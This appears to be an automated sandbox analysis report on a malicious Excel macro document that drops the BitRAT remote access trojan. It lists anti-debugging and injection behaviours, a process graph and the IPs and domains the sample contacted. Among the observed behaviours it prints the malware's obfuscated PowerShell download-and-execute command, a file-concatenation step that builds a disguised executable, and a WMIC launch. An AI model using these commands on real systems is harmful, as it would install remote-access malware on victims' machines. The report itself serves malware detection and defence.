Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A3C mov eax, dword ptr fs:[00000030h] 27_2_02210A3C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210704 mov ecx, dword ptr fs:[00000030h] 27_2_02210704
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B06 mov eax, dword ptr fs:[00000030h] 27_2_02210B06
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C06 mov eax, dword ptr fs:[00000030h] 27_2_02210C06
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A08 mov eax, dword ptr fs:[00000030h] 27_2_02210A08
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210D17 mov eax, dword ptr fs:[00000030h] 27_2_02210D17
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221096C mov eax, dword ptr fs:[00000030h] 27_2_0221096C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B6E mov eax, dword ptr fs:[00000030h] 27_2_02210B6E
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A70 mov eax, dword ptr fs:[00000030h] 27_2_02210A70
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C4B mov ecx, dword ptr fs:[00000030h] 27_2_02210C4B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221115B mov ecx, dword ptr fs:[00000030h] 27_2_0221115B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109A0 mov eax, dword ptr fs:[00000030h] 27_2_022109A0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BA2 mov eax, dword ptr fs:[00000030h] 27_2_02210BA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov ebx, dword ptr fs:[00000030h] 27_2_02210EA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov edx, dword ptr fs:[00000030h] 27_2_02210EA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AA4 mov eax, dword ptr fs:[00000030h] 27_2_02210AA4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210698 mov eax, dword ptr fs:[00000030h] 27_2_02210698
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210CD5 mov ecx, dword ptr fs:[00000030h] 27_2_02210CD5
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AD5 mov eax, dword ptr fs:[00000030h] 27_2_02210AD5
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109D4 mov eax, dword ptr fs:[00000030h] 27_2_022109D4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BD6 mov eax, dword ptr fs:[00000030h] 27_2_02210BD6
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0069B53C mov eax, dword ptr fs:[00000030h] 29_2_0069B53C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004AABEB GetProcessHeap,HeapFree, 29_2_004AABEB
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_006814DA
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_0068B781

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: Scanned_25526662-Payment.xls, type: SAMPLE
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: Test3.jpg, 0000001D.00000003.488792166.00000000035B4000.00000004.00000001.sdmp Binary or memory string: Program Manager]
Source: Test3.jpg, 0000001D.00000003.470470282.00000000035B4000.00000004.00000001.sdmp Binary or memory string: Program ManagerY

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0040EA7D cpuid 29_2_0040EA7D
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW, 29_2_0058E1F1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: ___crtGetLocaleInfoEx, 29_2_0058E2F3
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW, 29_2_006A2367
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 29_2_006AABFF
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAE77
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAEC2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006AAF5D
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_006AB363
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_006AB537
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: EnumSystemLocalesW, 29_2_006A1DE7
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004139F1 __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64, 29_2_004139F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected BitRAT
Source: Yara match File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

Remote Access Functionality:

barindex
Yara detected BitRAT
Source: Yara match File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 337288 Sample: Scanned_25526662-Payment.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for dropped file 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 29 37 2->9         started        13 Test3.jpg 2->13         started        process3 file4 44 C:\Users\...\Scanned_25526662-Payment.xls.LNK, MS 9->44 dropped 66 Document exploit detected (process start blacklist hit) 9->66 68 PowerShell case anomaly found 9->68 15 cmd.exe 1 9->15         started        70 Antivirus detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 74 Maps a DLL or memory area into another process 13->74 76 Contains functionality to hide a thread from the debugger 13->76 18 Test3.jpg 1 13->18         started        signatures5 process6 dnsIp7 78 PowerShell case anomaly found 15->78 21 powershell.exe 15 36 15->21         started        26 conhost.exe 15->26         started        50 45.15.143.216, 49734, 49740, 49742 DEDIPATH-LLCUS Latvia 18->50 80 Hides threads from debuggers 18->80 signatures8 process9 dnsIp10 52 lankarecipes.com 192.185.236.165, 49731, 80 UNIFIEDLAYER-AS-1US United States 21->52 40 C:\Users\user\AppData\Local\Temp\Test1.txt, PE32 21->40 dropped 42 C:\Users\user\AppData\...\nwaha3c5.cmdline, UTF-8 21->42 dropped 64 Powershell drops PE file 21->64 28 cmd.exe 1 21->28         started        30 cmd.exe 2 21->30         started        33 csc.exe 3 21->33         started        file11 signatures12 process13 file14 35 WMIC.exe 1 28->35         started        46 C:\Users\user\AppData\Local\Temp\Test3.jpg, PE32 30->46 dropped 48 C:\Users\user\AppData\Local\...\nwaha3c5.dll, PE32 33->48 dropped 38 cvtres.exe 1 33->38         started        process15 signatures16 62 Creates processes via WMI 35->62
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.15.143.216
 unknown Latvia
35913 DEDIPATH-LLCUS false
192.185.236.165
 unknown United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
lankarecipes.com 192.185.236.165 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://lankarecipes.com/Sparc.jpg false
  • Avira URL Cloud: safe
 unknown